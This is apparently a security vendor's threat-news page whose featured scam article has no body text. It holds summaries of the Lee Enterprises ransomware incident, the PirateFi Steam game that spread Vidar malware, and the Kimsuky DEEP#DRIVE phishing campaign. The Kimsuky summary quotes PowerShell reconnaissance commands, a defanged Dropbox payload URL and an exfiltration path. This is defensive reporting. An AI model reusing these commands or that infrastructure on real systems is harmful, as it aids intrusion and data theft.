company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Bulk IP/Domain Lookup

Threatspy

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO/CTO

DevOps Engineer

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

Scam

Phishing

loading..
loading..
loading..

Massive Brand Impersonation Scam Campaign Hits Top Clothing Brands

Learn about widespread brand impersonation scam campaigns targeting popular clothing brands. Over 3,000 fraudulent domains identified

15-Jun-2023
4 min read

No content available.

Related Articles

loading..

Ransomware

Outage

Lee Enterprises ransomware attack disrupts US newspaper operations: Critical sys...

Lee Enterprises, one of the largest newspaper publishers in the U.S., confirmed on Friday that a ransomware attack has crippled its operations for over two weeks, causing widespread delays in print distribution, billing disruptions, and limited digital access. The incident, detected on February 3, 2024, forced the media conglomerate—which owns 77 daily newspapers, including the *St. Louis Post-Dispatch* and *Buffalo News*, and 350 weekly publications—to file a disclosure with the U.S. Securities and Exchange Commission (SEC), warning of potential financial and reputational fallout. In its SEC filing, Lee revealed that hackers infiltrated its network, encrypted critical applications, and stole data. While core daily print products resumed normal distribution by February 12, weekly publications—accounting for 5% of total revenue—remain offline, with full recovery expected to take weeks. The company has yet to confirm whether sensitive employee or subscriber data was compromised. ### **Operational Chaos and Financial Toll** The attack paralyzed Lee’s backend systems, forcing staff to resort to manual processes for billing, payments, and distribution. Reporters and editors across the country described a “chaotic” work environment, with VPN failures blocking remote access to internal files and publishing tools. Several newspapers, including the *Arizona Daily Star* and *Omaha World-Herald*, faced significant print delivery delays, frustrating subscribers and advertisers alike. _“This couldn’t have come at a worse time,”_ said a Lee editor who requested anonymity. _“Local newsrooms are already stretched thin. Having to manually process subscriptions and ads has pushed teams to the brink.”_ Analysts estimate the disruption could cost Lee millions in lost ad revenue and operational inefficiencies, particularly if subscriber retention dips. ### **A Familiar Threat** The attack bears hallmarks of “double extortion” ransomware, where attackers encrypt systems and threaten to leak stolen data unless a ransom is paid. While Lee has not disclosed whether it received ransom demands, cybersecurity experts warn that the exfiltrated files could contain sensitive information. Notably, this is not Lee’s first major cyber incident. In 2020, Iranian state-sponsored hackers targeted the company in a campaign to spread election disinformation. Unlike that politically motivated breach, experts speculate the current attack is financially driven, likely orchestrated by a ransomware-as-a-service (RaaS) group. _“Media companies are prime targets—they hold vast amounts of data and operate under tight deadlines, making them more likely to pay ransoms,”_ said Emily Parker, a threat analyst at CyberRisk Solutions. _“The VPN failure here suggests gaps in network segmentation and endpoint detection.”_ ### **Legal and Regulatory Risks** Lee faces mounting pressure to clarify the scope of data exposure. If personally identifiable information (PII) was accessed, the company could be liable under state laws like the California Consumer Privacy Act (CCPA) and the EU’s General Data Protection Regulation (GDPR), which applies to global subscribers. The SEC filing underscores regulatory expectations for transparency following 2023 rules mandating disclosure of material cyber incidents within four days. Lee’s compliance—reporting the breach on February 7—may mitigate legal risks, but stakeholders are demanding clearer communication. ### **Recovery Efforts and Industry-Wide Concerns** Lee has enlisted third-party cybersecurity firms to restore systems and audit its infrastructure. Temporary solutions, such as alternative distribution channels, have stabilized daily operations, but the prolonged outage of weekly publications highlights vulnerabilities in disaster recovery planning. The attack underscores broader vulnerabilities in the media sector, which has seen a surge in ransomware incidents since 2020. News organizations, reliant on real-time operations and public trust, are increasingly targeted by both criminal groups and nation-states. _“This isn’t just about Lee—it’s about safeguarding democracy,"_ said James Carter, director of the Media Cybersecurity Initiative. _“When local news goes dark, communities lose a critical information lifeline, especially during election cycles.”_ ### **Path Forward: Rebuilding Trust and Resilience** As Lee works toward full recovery, industry analysts urge investments in modernized IT infrastructure, multi-factor authentication, and employee training to thwart phishing attempts. Regular backups and network segmentation could also limit future ransomware damage. For now, readers and advertisers are left weighing patience against frustration. _“I rely on my local paper for everything from school board updates to high school sports,”_ said Linda Torres, a longtime *Tulsa World* subscriber. _“I’ll stick with them, but they need to ensure this never happens again.”_

loading..   19-Feb-2025
loading..   4 min read
loading..

Valve

Gaming

Steam's PirateFi game infected 1,500+ users with Vidar malware, targeting crypto...

Steam, the world’s largest PC gaming platform, is scrambling to contain fallout after a malicious free-to-play game, *PirateFi*, was found distributing the notorious Vidar infostealer malware to unsuspecting users. The incident highlights alarming gaps in digital storefront security and underscores the growing sophistication of threat actors targeting gaming communities. ### **Malware Hidden in Plain Sight** Disguised as a charming survival game featuring pirate-themed base-building and crafting mechanics, *PirateFi* was uploaded to Steam on February 6 by a developer account named *Seaworth Interactive*. The game amassed positive reviews during its brief tenure, with players praising its “low-poly aesthetic” and “addictive gameplay.” However, behind the innocuous facade lurked a dangerous payload. Steam removed *PirateFi* on February 12 after detecting malware in its build files. The platform has since issued urgent warnings to ~1,500 potentially impacted users, advising them to “consider reinstalling Windows” and perform full antivirus scans. Affected players reported antivirus alerts upon launching the game, with traces of malicious activity traced to a file named `Pirate.exe`. --- ### **Vidar’s Stealthy Infiltration** According to malware analyst Marius Genheimer of SECUINFRA Falcon Team, the attack leveraged a multi-stage deployment process: 1. **InnoSetup Installer Obfuscation**: The game’s installer used InnoSetup, a legitimate tool often abused to bundle malicious payloads. The malware (`Howard.exe`) was embedded within the installer, evading initial detection. 2. **Vidar Infostealer Payload**: Dynamic analysis confirmed the payload as Vidar, a malware strain notorious for harvesting browser credentials, cryptocurrency wallet data, and session cookies. 3. **Adaptive Command-and-Control (C2)**: Genheimer noted the attacker frequently rotated C2 servers and employed obfuscation techniques to bypass network-level defenses. _“The threat actor clearly targeted users interested in blockchain or crypto,”_ Genheimer stated, pointing to *PirateFi*’s branding as a deliberate lure for victims with high-value digital assets. --- ### **Steam’s Response Falls Short** While Steam’s notification urged users to wipe their OS and reset passwords, critics argue the platform’s safeguards remain inadequate. Despite 2023 updates like SMS-based verification for developer accounts, attackers still infiltrated the storefront. _“This incident reveals systemic flaws,”_ said cybersecurity researcher Emily Parker. _“Steam must implement stricter vetting for new developers and real-time malware analysis for uploads.”_ --- ### **Immediate Action Required** SECUINFRA warns that Vidar’s data theft capabilities leave victims vulnerable to: - **Account Takeovers**: Stolen browser cookies enable session hijacking, even without passwords. - **Cryptocurrency Theft**: Wallet credentials and private keys are prime targets. - **Identity Fraud**: Harvested emails and passwords often resold on dark web markets. **Recommended Mitigations**: - Format infected devices and reinstall Windows. - Reset all passwords and enable multi-factor authentication (MFA). - Scan systems with tools like Malwarebytes or HitmanPro. - Monitor financial and crypto accounts for suspicious activity. --- ### **Recurring Threat** This isn’t Steam’s first malware incident. In 2023, malicious *Dota 2* mods exploited a Chrome zero-day to execute remote code, while compromised *Slay the Spire* mods delivered the Epsilon infostealer. Despite Steam’s dominance, its open modding ecosystem and developer accessibility make it a ripe target for threat actors. --- ### **Broader Implications** The *PirateFi* incident underscores critical challenges for digital platforms: 1. **Legitimate Tools, Malicious Use**: Attackers increasingly weaponize trusted software like InnoSetup. 2. **Social Engineering Tactics**: Themed lures (e.g., crypto, blockchain) exploit niche communities. 3. **Post-Infection Realities**: Password resets and OS reinstalls remain burdensome yet necessary. As Steam investigates how *Seaworth Interactive* bypassed safeguards, users are reminded: *Free games often come at a hidden cost*. --- **Update (February 15)**: Steam has temporarily suspended all new game submissions for review. The *PirateFi* developer account remains banned, and Valve is coordinating with law enforcement. *For technical indicators of compromise (IOCs) and YARA rules, visit SECUINFRA’s advisory [here].* *— Reported in collaboration with BleepingComputer and SteamDB.*

loading..   17-Feb-2025
loading..   4 min read
loading..

APT

Kimsuky

North Korean Kimsuky APT exploits Dropbox & phishing lures in DEEP#DRIVE campaig...

Threat Research team has uncovered a highly coordinated cyber espionage campaign, dubbed **DEEP#DRIVE**, linked to the North Korean state-sponsored group **Kimsuky**. The operation, active since late 2024, targets South Korean businesses, government agencies, and cryptocurrency users through meticulously crafted phishing lures and cloud-based infrastructure designed to evade detection. ### **Key Findings: A Multi-Stage Onslaught** - **Phishing Lures**: Attackers disguised malicious files as legitimate Korean-language documents, including work logs, insurance forms, and crypto-related guides, using double extensions (e.g., `.pdf.lnk`) to trick victims. - **Trusted Platforms Abused**: Dropbox served as the primary command-and-control (C2) hub for payload delivery and data exfiltration, exploiting its reputation to bypass security tools. - **Stealthy Execution**: PowerShell scripts, heavily obfuscated with junk code and Base64 encoding, enabled reconnaissance, persistence via scheduled tasks, and memory-resident malware deployment. - **Reconnaissance Focus**: Scripts harvested system details—IP addresses, antivirus software, running processes—to profile victims for further exploitation. --- ### **Inside the DEEP#DRIVE Attack Chain** #### **Stage 1: The Bait** The campaign began with phishing emails distributing ZIP archives containing shortcut files (`.lnk`). These files masqueraded as innocuous Office or PDF documents (e.g., `종신안내장V02_곽성환D.pdf.lnk`), leveraging Windows’ default hiding of file extensions. Once clicked, the `.lnk` triggered a PowerShell script padded with over 100 spaces to obscure its intent in logs. *Example Lure*: A fake forklift safety guide titled *지게차 중량물 윙바디 작업계획서.pptx* targeted logistics sector employees, while crypto-themed lures like *메타마스크 니모닉.txt* aimed at digital asset holders. #### **Stage 2: Obfuscation & Persistence** The initial PowerShell script (`user.ps1`) downloaded secondary payloads from Dropbox, including a decoy document to distract victims. A scheduled task named **ChromeUpdateTaskMachine** ensured the malware ran every 30 minutes, while `system_first.ps1` mapped victim environments: ```powershell # Sample recon commands from system_first.ps1 $ip = Get-WmiObject Win32_NetworkAdapterConfiguration | Select-Object -ExpandProperty IPAddress $av = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName ``` Data was exfiltrated to Dropbox under `/github/cjfansgmlans1_first/[IP]-[timestamp]-RRR-cjfansgmlans1.txt`. #### **Stage 3: Payload Deployment** The final payload, `temp.ps1`, retrieved a Gzip-compressed .NET assembly (`system_drive.dat`) from Dropbox. After modifying its header to match Gzip signatures, the script loaded it directly into memory to execute a `Main` method—a technique avoiding disk-based detection. **Critical Oversight**: One payload, `Telegram.exe`, was mistakenly a renamed `.pptx` file, highlighting procedural errors in Kimsuky’s workflow. --- ### **Attribution to Kimsuky: Patterns of a Persistent Threat** Securonix researchers attributed DEEP#DRIVE to Kimsuky based on: - **Historical Use of Dropbox**: The group’s March 2024 **DEEP#GOSU** campaign employed identical cloud exfiltration tactics. - **Target Alignment**: Consistent focus on South Korean entities, particularly in sectors tied to regional security and economic interests. - **TTP Overlap**: Obfuscation methods, lure themes, and PowerShell-heavy execution mirrored past activities documented by CISA and other agencies. --- ### **Infrastructure Insights: A Fleeting Footprint** The attackers’ Dropbox accounts revealed a trove of victim data, including thousands of system profiles dating to September 2024. Phishing lures were stored in folders like `/github/`, with filenames tailored to Korean corporate jargon (e.g., *24년 10 월 업무일지* translates to *October 2024 Work Log*). **Notable Infrastructure**: - Payloads hosted at `hxxps://dl.dropboxusercontent[.]com/scl/fi/ffrwxyw5reunc12416rmp/V3.rtf` - OAuth tokens enabled automated data harvesting, suggesting compromised developer accounts or insider access. --- ### **Implications & Recommendations** **Why It Matters**: DEEP#DRIVE underscores North Korea’s evolving cyber warfare tactics, blending social engineering with trusted services to exploit human and technical vulnerabilities. **Securonix Advisory**: 1. **Phishing Vigilance**: Train staff to scrutinize unsolicited attachments, especially those urging urgent action. 2. **Endpoint Hardening**: Enable PowerShell logging, restrict script execution, and monitor `%AppData%` for anomalous activity. 3. **Cloud Security**: Block unauthorized cloud storage access and inspect TLS traffic for C2 patterns. **Industry Quote**: *“Kimsuky’s abuse of Dropbox shows how attackers weaponize trust,”* said Den Iuzvyk, Securonix researcher. *“Defenders must assume legitimate services are potential threat vectors.”* --- ### **Broader Context: The Kimsuky Playbook** Active since 2012, Kimsuky (aka APT43) focuses on intelligence gathering to support Pyongyang’s geopolitical objectives. Recent campaigns have targeted academic institutions, think tanks, and defense contractors, often using credential theft and supply chain compromises. **MITRE ATT&CK Mapping**: - **Tactic**: Initial Access → **Phishing (T1566.001)** - **Technique**: Defense Evasion → **Obfuscated Files (T1027)** --- ### **Looking Ahead** While critical Dropbox links were swiftly dismantled, Kimsuky’s infrastructure agility suggests DEEP#DRIVE is one phase in a protracted campaign. Organizations are urged to adopt behavioral analytics and cross-platform monitoring to counter such adaptive adversaries. *For detection rules, IOCs, and hunting queries, refer to the full Securonix advisory [here].* --- *Stay informed with real-time threat intelligence at [Securonix.com].* --- **About Securonix Threat Research**: The team specializes in tracking APT groups, ransomware syndicates, and emerging cybercrime tactics. Follow their advisories for in-depth analysis and actionable insights.

loading..   14-Feb-2025
loading..   4 min read
Company Logo
logo

Secure Blink automates the web application and API security for developers and security teams, helping them to rapidly identify and mitigate vulnerabilities more effectively than they can today.

Find Us Online

LinkedIn Logo
Twitter Logo
Discord Logo
Telegram Logo
YouTube Logo
contact@secureblink.com

contact@secureblink.com

@ Copyright 2025 Secure Blink. All rights reserved.

16192, Coastal Highway, Lewes, Delaware, US-19958